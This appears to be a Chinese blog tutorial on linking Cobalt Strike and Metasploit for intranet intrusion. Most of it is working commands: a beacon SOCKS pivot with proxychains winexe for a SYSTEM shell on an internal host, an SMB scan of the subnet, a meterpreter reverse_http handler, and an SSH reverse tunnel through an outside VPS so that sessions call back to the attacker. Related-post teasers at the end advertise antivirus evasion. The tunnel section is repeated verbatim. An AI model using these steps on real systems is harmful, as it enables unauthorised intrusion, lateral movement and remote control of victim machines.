cs与msf联动概述

cobalt strike（简称CS）及Metasploit（简称msf）各有所长，cs更适合作为稳控平台，msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长，我们进行联动。

获得beacon shell，启动socks
shell ipconfig 目标机器在24.*网段，仅一个网段
思路：利用 beacon shell 在目标机器和团队服
务器之间建立 socks，而后再在本地利用proxychains 之类的工具连到目标内网即可。

查看团队服务器 socks 端口启起来了没有：netstat -tunlp | grep 5354
本地 kali 编辑 /etc/proxychains.conf 文件，挂上团队服务器 ip 和 socks 端口，就可以直接连到目标内网（类型为socks4）
proxychains winexe -U administrator --system --ostype=1 //192.168.24.149 cmd.exe

通过cs内置的socks代理将本地msf带入目标内网执行操作
利用 beacon socks 把 msf 挂到目标内网下
可以用 proxychains 之类的工具依次代理，如果想更方便一点，直接把整个 msf 挂到目标内网去。

让本地 msf 所有模块的流量都从 cs 的 socks 代理走
可以用 proxychains 之类的工具一个个代，如果想更方便一点，直接把整个 msf 挂到目标内网去。

msf5 > setg ReverseAllowProxy true //如果通过此 socks 反弹 shell，则需要开启此项，不推荐，速度慢，动静大
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.24.0/24 //识别目标内网所有windows 机器的详细系统版本，机器名和所在域/工作组
msf5 auxiliary(scanner/smb/smb_version) > set threads 10 //真实环境中线程尽量低，10以内msf5 auxiliary(scanner/smb/smb_version) > run

cs与msf联动之外部监听器
1、cs上创建一个http的外部监听器，回连端口为8889
2、本地机器把 msf 起起来，并创建如下监听器，注意协议的对应
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload
windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost192.168.123.136
msf5 exploit(multi/handler) > set lport 8889
msf5 exploit(multi/handler) > run
[*] Started HTTP reverse handler on
http://192.168.31.78:8889

使用ssh隧道,编辑 sshd 配置,开启 ssh 转发功能,重启 ssh 服务
1、在 vps 上编辑配置vi /etc/ssh/sshd_config
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes

2、systemctl restart sshd.service

3、回到本地的 kali 中，通过 ssh 隧道做转发

创建ssh隧道常用的参数：
-C：压缩传输，提供传输速度
-f：将ssh传输转入后台执行，不占用当前的shell
-N：建立静默连接（建立了连接，但是看不到具体会话）
-g：允许远程主机连接本地用于转发的端口
-L：本地端口转发
-R：远程端口转发
-D：动态转发
-P：指定ssh端口
ssh -C -f -N -g -R 0.0.0.0:8889:192.168.123.136:8889
root@39.108.68.207 -p 22
通过 39.108.68.207机器把外部的 8889 端口上的流量转到本地
192.168.123.136 的 8889 端口上，而本地的 8889 端口上跑的又是
meter 的监听器，所以，最终才造成 meterpreter 本地上线的效果。创建ssh隧道常用的参数：
-C：压缩传输，提供传输速度
-f：将ssh传输转入后台执行，不占用当前的shell
-N：建立静默连接（建立了连接，但是看不到具体会话）
-g：允许远程主机连接本地用于转发的端口
-L：本地端口转发
-R：远程端口转发
-D：动态转发
-P：指定ssh端口
ssh -C -f -N -g -R 0.0.0.0:8889:192.168.123.136:8889
root@39.108.68.207 -p 22
通过 39.108.68.207机器把外部的 8889 端口上的流量转到本地
192.168.123.136 的 8889 端口上，而本地的 8889 端口上跑的又是
meter 的监听器，所以，最终才造成 meterpreter 本地上线的效果。

回到 vps 上查看是否启动：
回到 cs 上，在会话处右键，选择 spawn

本地返回meterpreter

cs与msf联动概述相关推荐

CS + MSF 联动
CS + MSF 联动首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpret ...
cs与msf的联合使用
cs和msf在内网渗透中的作用 cs主要用于,反弹会话,提权,内网渗透防线,但cs的exp,提权方面没有msf强,但cs以操作简单,图形化界面,比msf强,使用两种工具结合可以很好的完成渗透测试工作, ...
遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...
# zTian.red:绕过卡巴斯基.360安全卫士.Windows Defender动态执行CS.MSF命令... 测试目标:Windows Defender.卡巴斯基.360安全卫士极速版系统环 ...
cs和msf配合进行内网的操作
cs中直接添加一个socks代理 msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测 setg Proxies socks4:xxx.xxx.xxx.xxx:44803
frp内网穿透教程2022最新（含内网ssh配置与msf联动配置）
1.frp简介 frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发. 1. ...
cs和msf实现内网横向移动3
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限一.通过172.16.1.123确定 ...
红队攻防之从边界突破到漫游内网(无cs和msf)
前言网络安全的本质:懂进攻,知防守,先正向,后逆向. 本篇文章目录网络拓扑图: 本次红队攻防实战所需绘制的拓扑图如下: 边界突破访问网站: http://xxx.xxx.xxx/?id=1 首页 ...
Cobalt Strike与Metasploit Framewor联动（会话传递）功能演示
一.前言 Cobalt Strike 是一个为模拟对手和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁.CS集成了很多功能,这些功能为渗透测试提供了便利的操作.同时CS还支持丰富的插件, ...
CobaltStrike（CS）与MetasploitFramework（MSF）联动
0x01 CS与MSF CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器.Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而 ...
细说——CS联动MSF
目录环境准备 CS --> MSF ubuntu准备 cs客户机器准备 msf准备补充 MSF --> CS MSF准备 ubuntu-cs准备网上的文章,写的很简洁,看的脑壳疼,自 ...

cs与msf联动概述

cs与msf联动概述相关推荐

最新文章

热门文章